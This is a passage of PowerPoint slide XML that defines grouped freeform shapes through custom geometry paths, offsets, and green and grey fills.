                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 449 w 1791"/>
                      <a:gd name="T1" fmla="*/ 0 h 480"/>
                      <a:gd name="T2" fmla="*/ 1791 w 1791"/>
                      <a:gd name="T3" fmla="*/ 359 h 480"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1791"/>
                      <a:gd name="T5" fmla="*/ 480 h 480"/>
                      <a:gd name="T6" fmla="*/ 0 w 1791"/>
                      <a:gd name="T7" fmla="*/ 121 h 480"/>
                      <a:gd name="T8" fmla="*/ 449 w 1791"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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791" h="480">
                        <a:moveTo>
                          <a:pt x="449" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1791" y="359"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="480"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="449" y="0"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="009900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37" name="Group 689"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3577" y="3770"/>
                  <a:ext cx="286" cy="92"/>
                  <a:chOff x="3577" y="3770"/>
                  <a:chExt cx="286" cy="92"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="446" name="Freeform 690"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3649" y="3789"/>
                    <a:ext cx="214" cy="73"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1344"/>
                      <a:gd name="T1" fmla="*/ 0 h 458"/>
                      <a:gd name="T2" fmla="*/ 0 w 1344"/>
                      <a:gd name="T3" fmla="*/ 97 h 458"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T5" fmla="*/ 458 h 458"/>
                      <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T7" fmla="*/ 359 h 458"/>
                      <a:gd name="T8" fmla="*/ 0 w 1344"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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44" h="458">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="458"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="35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7" name="Freeform 691"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3577" y="3828"/>
                    <a:ext cx="72" cy="34"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 448"/>
                      <a:gd name="T1" fmla="*/ 217 h 217"/>
                      <a:gd name="T2" fmla="*/ 0 w 448"/>
                      <a:gd name="T3" fmla="*/ 118 h 217"/>
                      <a:gd name="T4" fmla="*/ 448 w 448"/>
                      <a:gd name="T5" fmla="*/ 0 h 217"/>
                      <a:gd name="T6" fmla="*/ 448 w 448"/>
                      <a:gd name="T7" fmla="*/ 96 h 217"/>
                      <a:gd name="T8" fmla="*/ 0 w 448"/>
                      <a:gd name="T9" fmla="*/ 217 h 2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48" h="217">
                        <a:moveTo>
                          <a:pt x="0" y="217"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="118"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="96"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="217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8" name="Freeform 692"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3577" y="3770"/>
                    <a:ext cx="286" cy="76"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 448 w 1792"/>
                      <a:gd name="T1" fmla="*/ 0 h 480"/>
                      <a:gd name="T2" fmla="*/ 1792 w 1792"/>
                      <a:gd name="T3" fmla="*/ 362 h 480"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1792"/>
                      <a:gd name="T5" fmla="*/ 480 h 480"/>
                      <a:gd name="T6" fmla="*/ 0 w 1792"/>
                      <a:gd name="T7" fmla="*/ 121 h 480"/>
                      <a:gd name="T8" fmla="*/ 448 w 1792"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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792" h="480">
                        <a:moveTo>
                          <a:pt x="448" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1792" y="362"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="480"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="0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38" name="Group 693"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3863" y="3846"/>
                  <a:ext cx="285" cy="93"/>
                  <a:chOff x="3863" y="3846"/>
                  <a:chExt cx="285" cy="93"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="443" name="Freeform 694"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3934" y="3866"/>
                    <a:ext cx="214" cy="73"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1344"/>
                      <a:gd name="T1" fmla="*/ 0 h 459"/>
                      <a:gd name="T2" fmla="*/ 0 w 1344"/>
                      <a:gd name="T3" fmla="*/ 97 h 459"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T5" fmla="*/ 459 h 459"/>
                      <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T7" fmla="*/ 362 h 459"/>
                      <a:gd name="T8" fmla="*/ 0 w 1344"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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44" h="459">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="459"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="36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4" name="Freeform 695"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3863" y="3904"/>
                    <a:ext cx="71" cy="35"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 447"/>
                      <a:gd name="T1" fmla="*/ 218 h 218"/>
                      <a:gd name="T2" fmla="*/ 0 w 447"/>
                      <a:gd name="T3" fmla="*/ 121 h 218"/>
                      <a:gd name="T4" fmla="*/ 447 w 447"/>
                      <a:gd name="T5" fmla="*/ 0 h 218"/>
                      <a:gd name="T6" fmla="*/ 447 w 447"/>
                      <a:gd name="T7" fmla="*/ 97 h 218"/>
                      <a:gd name="T8" fmla="*/ 0 w 447"/>
                      <a:gd name="T9" fmla="*/ 218 h 2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47" h="218">
                        <a:moveTo>
                          <a:pt x="0" y="218"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="447" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="447" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="218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5" name="Freeform 696"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3863" y="3846"/>
                    <a:ext cx="285" cy="77"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 447 w 1791"/>
                      <a:gd name="T1" fmla="*/ 0 h 482"/>
                      <a:gd name="T2" fmla="*/ 1791 w 1791"/>
                      <a:gd name="T3" fmla="*/ 361 h 482"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1791"/>
                      <a:gd name="T5" fmla="*/ 482 h 482"/>
                      <a:gd name="T6" fmla="*/ 0 w 1791"/>
                      <a:gd name="T7" fmla="*/ 120 h 482"/>
                      <a:gd name="T8" fmla="*/ 447 w 1791"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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791" h="482">
                        <a:moveTo>
                          <a:pt x="447" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1791" y="361"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="482"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="120"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="447" y="0"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="009900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39" name="Group 697"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4006" y="3885"/>
                  <a:ext cx="285" cy="92"/>
                  <a:chOff x="4006" y="3885"/>
                  <a:chExt cx="285" cy="92"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="440" name="Freeform 698"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="4077" y="3904"/>
                    <a:ext cx="214" cy="73"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1344"/>
                      <a:gd name="T1" fmla="*/ 0 h 459"/>
                      <a:gd name="T2" fmla="*/ 0 w 1344"/>
                      <a:gd name="T3" fmla="*/ 97 h 459"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T5" fmla="*/ 459 h 459"/>
                      <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T7" fmla="*/ 362 h 459"/>
                      <a:gd name="T8" fmla="*/ 0 w 1344"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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44" h="459">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="459"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="36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1" name="Freeform 699"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="4006" y="3942"/>
                    <a:ext cx="71" cy="35"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 448"/>
                      <a:gd name="T1" fmla="*/ 218 h 218"/>
                      <a:gd name="T2" fmla="*/ 0 w 448"/>
                      <a:gd name="T3" fmla="*/ 121 h 218"/>
                      <a:gd name="T4" fmla="*/ 448 w 448"/>
                      <a:gd name="T5" fmla="*/ 0 h 218"/>
                      <a:gd name="T6" fmla="*/ 448 w 448"/>
                      <a:gd name="T7" fmla="*/ 97 h 218"/>
                      <a:gd name="T8" fmla="*/ 0 w 448"/>
                      <a:gd name="T9" fmla="*/ 218 h 2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48" h="218">
                        <a:moveTo>
                          <a:pt x="0" y="218"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="218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2" name="Freeform 700"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="4006" y="3885"/>
                    <a:ext cx="285" cy="77"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 448 w 1792"/>
                      <a:gd name="T1" fmla="*/ 0 h 482"/>
                      <a:gd name="T2" fmla="*/ 1792 w 1792"/>
                      <a:gd name="T3" fmla="*/ 361 h 482"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1792"/>
                      <a:gd name="T5" fmla="*/ 482 h 482"/>
                      <a:gd name="T6" fmla="*/ 0 w 1792"/>
                      <a:gd name="T7" fmla="*/ 120 h 482"/>
                      <a:gd name="T8" fmla="*/ 448 w 1792"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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792" h="482">
                        <a:moveTo>
                          <a:pt x="448" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1792" y="361"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="482"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="120"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="0"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="009900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26" name="Group 701"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="1137" y="2444"/>
                <a:ext cx="499" cy="150"/>
                <a:chOff x="-240" y="-1656"/>
                <a:chExt cx="3137" cy="940"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="431" name="Freeform 702"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="658" y="-1656"/>
                  <a:ext cx="446" cy="217"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 446"/>
                    <a:gd name="T1" fmla="*/ 0 h 217"/>
                    <a:gd name="T2" fmla="*/ 0 w 446"/>
                    <a:gd name="T3" fmla="*/ 97 h 217"/>
                    <a:gd name="T4" fmla="*/ 446 w 446"/>
                    <a:gd name="T5" fmla="*/ 217 h 217"/>
                    <a:gd name="T6" fmla="*/ 446 w 446"/>
                    <a:gd name="T7" fmla="*/ 120 h 217"/>
                    <a:gd name="T8" fmla="*/ 0 w 446"/>
                    <a:gd name="T9" fmla="*/ 0 h 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6" h="217">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="97"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="217"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446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32" name="Freeform 703"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-240" y="-1656"/>
                  <a:ext cx="3137" cy="843"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 2887 w 3137"/>
                    <a:gd name="T1" fmla="*/ 54 h 843"/>
                    <a:gd name="T2" fmla="*/ 898 w 3137"/>
                    <a:gd name="T3" fmla="*/ 0 h 843"/>
                    <a:gd name="T4" fmla="*/ 1344 w 3137"/>
                    <a:gd name="T5" fmla="*/ 120 h 843"/>
                    <a:gd name="T6" fmla="*/ 0 w 3137"/>
                    <a:gd name="T7" fmla="*/ 482 h 843"/>
                    <a:gd name="T8" fmla="*/ 1344 w 3137"/>
                    <a:gd name="T9" fmla="*/ 843 h 843"/>
                    <a:gd name="T10" fmla="*/ 2688 w 3137"/>
                    <a:gd name="T11" fmla="*/ 482 h 843"/>
                    <a:gd name="T12" fmla="*/ 3137 w 3137"/>
                    <a:gd name="T13" fmla="*/ 602 h 843"/>
                    <a:gd name="T14" fmla="*/ 2887 w 3137"/>
                    <a:gd name="T15" fmla="*/ 54 h 8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137" h="843">
                      <a:moveTo>
                        <a:pt x="2887" y="54"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="898" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="482"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="843"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2688" y="482"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3137" y="602"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2887" y="54"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="009900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33" name="Freeform 704"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-240" y="-1174"/>
                  <a:ext cx="1344" cy="458"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1344"/>
                    <a:gd name="T1" fmla="*/ 0 h 458"/>
                    <a:gd name="T2" fmla="*/ 0 w 1344"/>
                    <a:gd name="T3" fmla="*/ 97 h 458"/>
                    <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                    <a:gd name="T5" fmla="*/ 458 h 458"/>
                    <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                    <a:gd name="T7" fmla="*/ 361 h 458"/>
                    <a:gd name="T8" fmla="*/ 0 w 1344"/>
                    <a:gd name="T9" fmla="*/ 0 h 4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4" h="458">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="97"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="458"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="36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34" name="Freeform 705"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2448" y="-1174"/>
                  <a:ext cx="449" cy="217"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 449"/>
                    <a:gd name="T1" fmla="*/ 0 h 217"/>
                    <a:gd name="T2" fmla="*/ 0 w 449"/>
                    <a:gd name="T3" fmla="*/ 97 h 217"/>
                    <a:gd name="T4" fmla="*/ 449 w 449"/>
                    <a:gd name="T5" fmla="*/ 217 h 217"/>
                    <a:gd name="T6" fmla="*/ 449 w 449"/>
                    <a:gd name="T7" fmla="*/ 120 h 217"/>
                    <a:gd name="T8" fmla="*/ 0 w 449"/>
                    <a:gd name="T9" fmla="*/ 0 h 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9" h="217">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="97"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="449" y="217"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="449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35" name="Freeform 706"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1104" y="-1174"/>
                  <a:ext cx="1344" cy="458"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1344"/>
                    <a:gd name="T1" fmla="*/ 458 h 458"/>
                    <a:gd name="T2" fmla="*/ 0 w 1344"/>
                    <a:gd name="T3" fmla="*/ 361 h 458"/>
                    <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                    <a:gd name="T5" fmla="*/ 0 h 458"/>
                    <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                    <a:gd name="T7" fmla="*/ 97 h 458"/>
                    <a:gd name="T8" fmla="*/ 0 w 1344"/>
                    <a:gd name="T9" fmla="*/ 458 h 4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4" h="458">
                      <a:moveTo>
                        <a:pt x="0" y="458"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="361"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="97"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="458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27" name="Group 707"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1494" y="2544"/>
                <a:ext cx="285" cy="92"/>
                <a:chOff x="4006" y="3885"/>
                <a:chExt cx="285" cy="92"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="428" name="Freeform 708"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="4077" y="3904"/>
                  <a:ext cx="214" cy="73"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1344"/>
                    <a:gd name="T1" fmla="*/ 0 h 459"/>
                    <a:gd name="T2" fmla="*/ 0 w 1344"/>
                    <a:gd name="T3" fmla="*/ 97 h 459"/>
                    <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                    <a:gd name="T5" fmla="*/ 459 h 459"/>
                    <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                    <a:gd name="T7" fmla="*/ 362 h 459"/>
                    <a:gd name="T8" fmla="*/ 0 w 1344"/>
                    <a:gd name="T9" fmla="*/ 0 h 4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4" h="459">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="97"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="459"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="36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29" name="Freeform 709"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="4006" y="3942"/>
                  <a:ext cx="71" cy="35"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 448"/>
                    <a:gd name="T1" fmla="*/ 218 h 218"/>
                    <a:gd name="T2" fmla="*/ 0 w 448"/>
                    <a:gd name="T3" fmla="*/ 121 h 218"/>
                    <a:gd name="T4" fmla="*/ 448 w 448"/>
                    <a:gd name="T5" fmla="*/ 0 h 218"/>
                    <a:gd name="T6" fmla="*/ 448 w 448"/>
                    <a:gd name="T7" fmla="*/ 97 h 218"/>
                    <a:gd name="T8" fmla="*/ 0 w 448"/>
                    <a:gd name="T9" fmla="*/ 218 h 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8" h="218">
                      <a:moveTo>
                        <a:pt x="0" y="218"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="448" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="448" y="97"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="218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30" name="Freeform 710"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="4006" y="3885"/>
                  <a:ext cx="285" cy="77"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 448 w 1792"/>
                    <a:gd name="T1" fmla="*/ 0 h 482"/>
                    <a:gd name="T2" fmla="*/ 1792 w 1792"/>
                    <a:gd name="T3" fmla="*/ 361 h 482"/>
                    <a:gd name="T4" fmla="*/ 1344 w 1792"/>
                    <a:gd name="T5" fmla="*/ 482 h 482"/>
                    <a:gd name="T6" fmla="*/ 0 w 1792"/>
                    <a:gd name="T7" fmla="*/ 120 h 482"/>
                    <a:gd name="T8" fmla="*/ 448 w 1792"/>
                    <a:gd name="T9" fmla="*/ 0 h 4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92" h="482">
                      <a:moveTo>
                        <a:pt x="448" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1792" y="361"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="482"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="448" y="0"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="009900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86" name="Group 912"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="8359725" y="2379285"/>
              <a:ext cx="1612019" cy="700878"/>
              <a:chOff x="4204" y="2536"/>
              <a:chExt cx="1288" cy="560"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="487" name="Freeform 717"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4204" y="2751"/>
                <a:ext cx="1288" cy="345"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 161"/>
                  <a:gd name="T1" fmla="*/ 22 h 44"/>
                  <a:gd name="T2" fmla="*/ 81 w 161"/>
                  <a:gd name="T3" fmla="*/ 0 h 44"/>
                  <a:gd name="T4" fmla="*/ 161 w 161"/>
                  <a:gd name="T5" fmla="*/ 22 h 44"/>
                  <a:gd name="T6" fmla="*/ 81 w 161"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 161"/>
                  <a:gd name="T9" fmla="*/ 2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44">
                    <a:moveTo>
                      <a:pt x="0" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="44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2B2B2">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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488" name="Group 718"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4707" y="2979"/>
                <a:ext cx="144" cy="59"/>
                <a:chOff x="931" y="1370"/>
                <a:chExt cx="904" cy="371"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="530" name="Freeform 719"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
